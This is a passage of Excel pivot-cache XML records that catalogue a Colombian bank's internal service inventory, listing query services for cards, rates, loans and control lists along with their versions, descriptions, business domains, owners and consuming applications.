    <s v="Productor"/>
    <s v="Tarjetas Débito"/>
    <s v="Soledad Morales Llano"/>
    <m/>
    <s v="Konivin - Vennko"/>
    <s v="NU0021001 _x000d__x000a_NU0019001 _x000d__x000a_NU0103001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Tarjetas Debito"/>
    <n v="200"/>
    <s v="No Aplica"/>
    <s v="Este servicio permite realizar diferentes tipos de consultas asociadas a las tarjetas débito, los cuales se listan a continuación. _x000a_• Listar las tarjetas activas de un cliente (PRODUCCION) _x000a_• Listar las tarjetas pendientes por activar (CONSTRUCCION)_x000a_• Listar las tarjetas canceladas (CONSTRUCCION) _x000a_• Consultar datos tarjetahabiente (PRODUCCION)_x000a_• Consultar código de seguridad (CONSTRUCCION)_x000a_• Listar las tarjetas activas de un cliente (PRODUCCION) _x000a_• Listar las tarjetas pendientes por activar (CONSTRUCCION)_x000a_• Listar las tarjetas canceladas (CONSTRUCCION) _x000a_• Consultar datos tarjetahabiente (PRODUCCION)_x000a_• Consultar código de seguridad (CONSTRUCCION)"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Debito y Prepago"/>
    <s v="Medios de pago Emision"/>
    <s v="Productor"/>
    <s v="Tarjetas Débito"/>
    <s v="Soledad Morales Llano"/>
    <m/>
    <s v="FINACLE"/>
    <s v="NU0021001 _x000d__x000a_NU0100001 _x000d__x000a_NU0101001 _x000d__x000a_PRODUCTORCONSUMIDOR _x000d__x000a_NU0091001 _x000d__x000a_DEVELOPSOATEST _x000d__x000a_NU0104001 _x000d__x000a_AW1184 _x000d__x000a_AW1184003"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Tarjetas Del Cliente"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio consulta tarjetas del cliente, traerá todas las tarjetas activas que tiene el cliente (Debito, crédito y virtuales), con las condiciones propias del canal de Billetera Móvil._x005f_x000D_ Nota:  Este servicio lo expone un servidor de  Canal Billetera y se expone en IIB10"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <s v="Medios de pago Emision"/>
    <s v="Productor"/>
    <s v="Digital Medios de Pago"/>
    <s v="Julian David Arboleda Velez"/>
    <m/>
    <s v="FINACLE"/>
    <s v="AW1189001 _x000d__x000a_AW1170"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Tarjetas PYME"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio ConsultaTarjetasPYME permite consultar la información de tarjetas de crédito para PYME. Permite listar las tarjetas PYME de un cliente o consultar los saldos consolidados de las tarjetas asociadas a un cliente PYME."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <s v="Medios de pago Emision"/>
    <s v="Productor"/>
    <s v="Digital Medios de Pago"/>
    <s v="Julian David Arboleda Velez"/>
    <m/>
    <m/>
    <s v="APIC _x000d__x000a_AW1176 _x000d__x000a_AW1285001 _x000d__x000a_AW1294001 _x000d__x000a_NU0114001 _x000d__x000a_AW1287"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Tasa"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio de ConsultaTasa tiene como objetivo consultar la tasa de la moneda extranjera, filtrando por una moneda origen y una moneda destino."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="FINACLE"/>
    <s v="AW1185001 _x000d__x000a_AW0360010"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Tasa Credito"/>
    <n v="200"/>
    <s v="No Aplica"/>
    <s v="Este servicio cuenta con la capacidad consultar los diferentes rangos de tasas de interés, montos y plazos, entre otros detalles que aplican para un plan de crédito de consumo en función algunas características del cliente y del crédito solicitado."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="BVC-Legados_Clientes legados_ISBVC0011"/>
    <s v="NU0102001 _x000d__x000a_AW1285001 _x000d__x000a_AW0856 _x000d__x000a_AW1313"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Tasa Credito"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio permite consultar las tasas ofrecidas para créditos de consumo (libre inversión)."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="FINACLE"/>
    <s v="AW0937 _x000d__x000a_AW0856"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Tasa De Cambio"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Servicio que permite consultar todas aquellas tasas de cambio que a hoy se manejan en el banco, tales como tasa digital, tasa plena, tasa EBS, TRM, entre otras."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Filiales del Exterior"/>
    <s v="Tesoreria"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="FINACLE"/>
    <s v="SVP _x000d__x000a_AW1011 _x000d__x000a_AW0360"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta TCRM"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este servicio tiene como alcance exponer la TCRM que la SuperIntendencia Financiera brinda por medio de un Web Services, para que cualquier aplicación o proceso de la Organización la pueda consultar en tiempo real."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <m/>
    <s v="FINACLE"/>
    <s v="AW0937 _x000d__x000a_AW1176 _x000d__x000a_AW1081001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Transacciones Prestamo"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Consulta general y detallada de las transacciones de un prestamo"/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_DEVELOPSOATEST"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Variables Precalculadas Riesgos"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Permite tomar de la BD de Riesgos, parte de las variables que requiere Motor para el proceso de aprobación en el Flujo de crédito de Consumo e Inmobiliario"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <s v="Ciclo de Crédito"/>
    <s v="Productor"/>
    <s v="Ecosistema de Riesgo de Crédito"/>
    <s v="Juliana Medina Martinez"/>
    <m/>
    <s v="Cyxtera"/>
    <s v="AW1097001 _x000d__x000a_AW1081001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consultar Centrales De Riesgo"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Componente que permite realizar la integración entre Bizagi y APM para ir a obtener la aprobación de un solicitante frente a las centrales de riesgo."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <s v="Ciclo de Crédito"/>
    <s v="Productor"/>
    <s v="Ecosistema de Riesgo de Crédito"/>
    <s v="Juliana Medina Martinez"/>
    <m/>
    <s v="FINACLE"/>
    <s v="AW0922 _x000d__x000a_AW0856"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consultar Cheques"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El usuario desde la sucursal virtual de empresa ó persona a partir de una cuenta del cliente, podrá consultar el estado de los cheques relacionados a una chequera a partir de una cuenta del cliente perteneciente a Filiales del exterior (Miami, Cayman, Panamá y Puerto Rico)."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="FINACLE"/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consultar Cheques Consignados"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Permite consultar la información de los cheques consignados en la cuenta especificada por el cliente, cuentas pertenecientes a cuenta de ahorros o cuenta corriente pertenecientes a Filiales de Exterior._x005f_x000D_ "/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <m/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consultar Clientes Precalculados"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio permite identificar si una persona se encuentra en la base de clientes con créditos precalculados y posee un cupo aprobado."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <s v="DATOS, ANALÍTICA, IA, BLOCKCHAIN"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <m/>
    <s v="Finacle - F.E_Panama_AW0709001"/>
    <s v="AW1097001 _x000d__x000a_AW1081001 _x000d__x000a_AW0939"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consultar Cobro Comision"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Permitir realizar la consulta de cobro de comisión que se aplica a una transacción realizada por un cliente, o consultada antes de realizar la transacción."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor"/>
    <s v="Captaciones"/>
    <s v="confirmar EVC dueña del servicio"/>
    <m/>
    <s v="Cuentas AFC_AW1110001"/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consultar Condiciones Pago Leasing"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Servicio utilizado por el proyecto de Leasing Habitacional para la consulta de condiciones de pago de un cliente"/>
    <s v="LEASING"/>
    <s v="Leasing"/>
    <s v="Leasing"/>
    <s v="Productor"/>
    <s v="Administración del ciclo de vida del activo"/>
    <s v="Juan Pablo Bahamon Betancur"/>
    <m/>
    <m/>
    <s v="AW0360006"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consultar Credito Hipotecario"/>
    <n v="200"/>
    <s v="No Aplica"/>
    <s v="El servicio expone capacidades que permiten consultar los proyectos asociados a un cliente constructor, así como los de un grupo económico o fiducias relacionados. Adicionalmente, permite la consulta de obligaciones asociadas a un proyecto hipotecario en particular y movimientos que presenten dichas obligaciones en un rango de fechas específico."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Hipotecario"/>
    <s v="Inmobiliario"/>
    <s v="Productor"/>
    <s v="Hipotecario"/>
    <s v="Martha Luz Pardo"/>
    <m/>
    <s v="Cuentas AFC_AW1110001"/>
    <s v="SAI _x000d__x000a_SVE _x000d__x000a_SCI _x000d__x000a_SVP _x000d__x000a_NU0004001 _x000d__x000a_AUD"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consultar Credito Hipotecario"/>
    <n v="300"/>
    <s v="No Aplica"/>
    <s v="El servicio expone capacidades que permiten consultar los proyectos asociados a un cliente constructor, así como los de un grupo económico o fiducias relacionados. Adicionalmente, permite la consulta de datos generales de obligaciones asociadas a un proyecto hipotecario o cliente individual así como movimientos que presenten dichas obligaciones en un rango de fechas específico, pudiendo identificar subrogaciones."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Hipotecario"/>
    <s v="Inmobiliario"/>
    <s v="Productor"/>
    <s v="Hipotecario"/>
    <s v="Martha Luz Pardo"/>
    <m/>
    <s v="Cuentas AFC_AW1110001"/>
    <s v="AW0360004 _x000d__x000a_SVE _x000d__x000a_NU0004001 _x000d__x000a_DEVELOPSOATEST"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consultar Detalle Chequera"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Permitir consultar el detalle de la(s) chequera(s) a partir de una cuenta corriente del cliente perteneciente a filiales del exterior (Cayman, Panamá, Miami y Puerto Rico)."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="Cuentas AFC_AW1110001"/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consultar Detalle Producto"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Realizar Consulta del detalle de un producto independientemente del tipo de producto (CDT, CASA, Crédito Retail, Crédito Corporativo) desde cualquier consumidor hacia Finacle para productos de cualquier filial del exterior.."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <m/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consultar Discrepancias"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Soportar la funcionalidad de consultar las discrepancias levantadas a un cliente para un producto Trade (carta de crédito de importación o garantía standby emitida) por parte de Bancolombia."/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <m/>
    <m/>
    <s v="AW0611001 _x000d__x000a_AW0360"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consultar Estado Cliente Listas Control"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Tiene como finalidad responder a la necesidad de validar la presencia del cliente en alguna de las listas negras"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
    <s v="Otras Funciones de Apoyo"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <m/>
    <s v="TDC_Macros para tarjetas_AW0485001"/>
    <s v="AW1177 _x000d__x000a_ELIBOM _x000d__x000a_AW0922 _x000d__x000a_AW0856 _x000d__x000a_AW1097001 _x000d__x000a_AW0998 _x000d__x000a_BSN _x000d__x000a_AW1170 _x000d__x000a_SYC _x000d__x000a_AW0683001 _x000d__x000a_AW1128 _x000d__x000a_AW1011 _x000d__x000a_AW0540001 _x000d__x000a_BancasegurosNube _x000d__x000a_AW0682001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consultar Estado Proveedores Listas Control"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="tiene como finalidad responder a la necesidad de validar la presencia del proveedor en alguna de las listas negras"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
    <s v="Otras Funciones de Apoyo"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <m/>
    <s v="TDC_Macros para tarjetas_AW0485001"/>
    <s v="AW0682001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consultar Fuentes Publicas Externas"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Servicio permite consultar información de diferentes fuentes públicas desde aplicaciones que requieran acceder a este tipo de información. "/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <s v="Evolución Digital"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <m/>
    <s v="AW0922 _x000d__x000a_AW0856 _x000d__x000a_AW1097001 _x000d__x000a_AW1170 _x000d__x000a_AW1302001 _x000d__x000a_AW1081001 _x000d__x000a_NU0142001 _x000d__x000a_AW0660001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consultar Giros Realizados"/>
    <n v="200"/>
    <s v="No Aplica"/>
    <s v="Permite la consulta de las transferencias externas realizadas desde una cuenta del cliente, perteneciente a filiales del exterior (Panamá, Caymán, Miami, Puerto Rico) y relacionada a los productos cuentas de ahorro y/ó cuentas corrientes."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <m/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consultar Giros Recibidos"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Desde la sucursal virtual, el cliente podrá consultar los giros recibidos en una cuenta específica propia de un producto de cuenta de ahorros ó cuenta corriente"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <m/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consultar Informacion Producto"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El usuario de la sucursal virtual (SVP y SVE) podrá solicitar la consulta de saldos ó consulta de movimientos ó consulta de saldos congelados (líen) de manera independiente ó de manera conjunta, es decir, tendrá la posibilidad de solicitar la consulta de saldos, de movimientos y líen con una solicitud."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <m/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consultar Informacion Sesion"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Servicio utilizado por transformación digital para la consulta de información de una sesión "/>
    <s v="LEASING"/>
    <s v="Leasing"/>
    <s v="Leasing"/>
    <s v="Productor"/>
    <s v="Administración del ciclo de vida del activo"/>
    <s v="Juan Pablo Bahamon Betancur"/>
    <m/>
    <m/>
    <s v="AW0360006"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consultar Listas Control Especiales"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Tiene como finalidad responder a la necesidad de validar la presencia del cliente en alguna de las listas negras"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
    <s v="Otras Funciones de Apoyo"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <m/>
    <s v="Finacle - F.E_Panama_AW0709001"/>
    <s v="AW0922 _x000d__x000a_SYC"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consultar Movimientos Producto"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Permitir consultar los Movimientos de un producto de un cliente correspondiente a: Movimientos de créditos retail, Movimientos de créditos corporate y Movimientos CASA (cuentas corrientes y ahorros) con y sin paginación. Los Movimientos de los productos a consultar pertenecen a filiales del exterior (Panamá, Caymán, Miami, Puerto Rico)."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Crédito"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="Administrador de Tasas_AW1168001"/>
    <s v="AW0453 _x000d__x000a_AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consultar Movimientos Producto"/>
    <n v="200"/>
    <s v="No Aplica"/>
    <s v="Permitir consultar los Movimientos de un producto de un cliente correspondiente a: Movimientos de créditos retail, Movimientos de créditos corporate y Movimientos CASA (cuentas corrientes y ahorros) con y sin paginación. Los Movimientos de los productos a consultar pertenecen a filiales del exterior (Panamá, Caymán, Miami, Puerto Rico)."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Crédito"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="Administrador de Tasas_AW1168001"/>
    <s v="AW0453"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consultar MT"/>
    <n v="200"/>
    <s v="No Aplica"/>
    <s v="Mostrar al cliente el detalle del MT. Cada vez que se realiza una transferencia vía SWIFT se genera un archivo denominado Formato MT 103 el cual contiene los datos del giro realizado o del giro recibido."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Tesoreria"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="Modulo Parametrizador Compra y Venta de Divisas Tesoreria_AW0899001"/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consultar OTP"/>
    <n v="110"/>
    <s v="No Aplica"/>
    <s v="Este servicio permite Consultar el estado de los clientes de los diferentes canales transaccionales del Banco en la aplicación proveedora Detect ID. Indica si el cliente está bloqueado o no."/>
    <m/>
    <m/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <m/>
    <s v="SuperFinanciera"/>
    <s v="AW0638 _x000d__x000a_AW0636"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consultar Saldos Congelados"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Permite la consulta de saldo detallado de cada uno de los tipos de líen (saldos congelados), con base en la cuenta de un titular ó cotitular. Ésta funcionalidad aplica para personas y empresas."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Riesgos"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="Servicios Riesgos_NA_AW1086001"/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-06-02T09:43:24"/>
    <s v="Consumer Loan"/>
    <n v="100"/>
    <s v="Consumer Loan - Independent Loan"/>
    <n v="100"/>
    <s v="consumer-loan-independent-loan"/>
    <s v="Esta API permite consultar la viabiliadad de una solicitud de credito para un cliente indepediente en un producto y/o servicio"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="RespuestaAlFrente_AW1086001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <m/>
    <m/>
    <m/>
    <n v="6"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-09-10T13:21:44"/>
    <s v="Consumer Loan Behavioral Models"/>
    <n v="111"/>
    <s v="Consumer Loan Behavioral Models - Consumption Loan Study"/>
    <n v="111"/>
    <s v="consumer-loan-behavioral-models-consumption-loan-study"/>
    <s v="El estudio de crédito de consumo habilita el análisis de un determinado cliente con el fin de evaluar cuales productos de crédito de consumo se le pueden otorgar. Dentro de los productos se tienen Crédito de Libre Inversión, CrediAgily Tarjeta de Crédito"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <s v="Ciclo de Crédito"/>
    <s v="Productor"/>
    <s v="Ecosistema de Riesgo de Crédito"/>
    <s v="Juliana Medina Martinez"/>
    <s v="EstudioCreditoConsumo/V1.0"/>
    <m/>
    <s v="EcosistemaRiesgos_AW1011 _x000d__x000a_ NequiAF_AW1011"/>
    <n v="2"/>
    <m/>
    <n v="21669"/>
    <n v="10135"/>
    <n v="5891"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-05-23T16:34:08"/>
    <s v="Consumer Loan Behavioral Models"/>
    <n v="200"/>
    <s v="Consumer Loan Behavioral Models - Consumption Loan Study"/>
    <n v="200"/>
    <s v="consumer-loan-behavioral-models-consumption-loan-study"/>
    <s v="El estudio de crédito de consumo habilita el análisis de un determinado cliente con el fin de evaluar cuales productos de crédito de consumo se le pueden otorgar. Dentro de los productos se tienen Crédito de Libre Inversión, CrediAgily Tarjeta de Crédito"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <s v="Ciclo de Crédito"/>
    <s v="Productor"/>
    <s v="Ecosistema de Riesgo de Crédito"/>
    <s v="Juliana Medina Martinez"/>
    <s v="EstudioCreditoConsumo/V1.0"/>
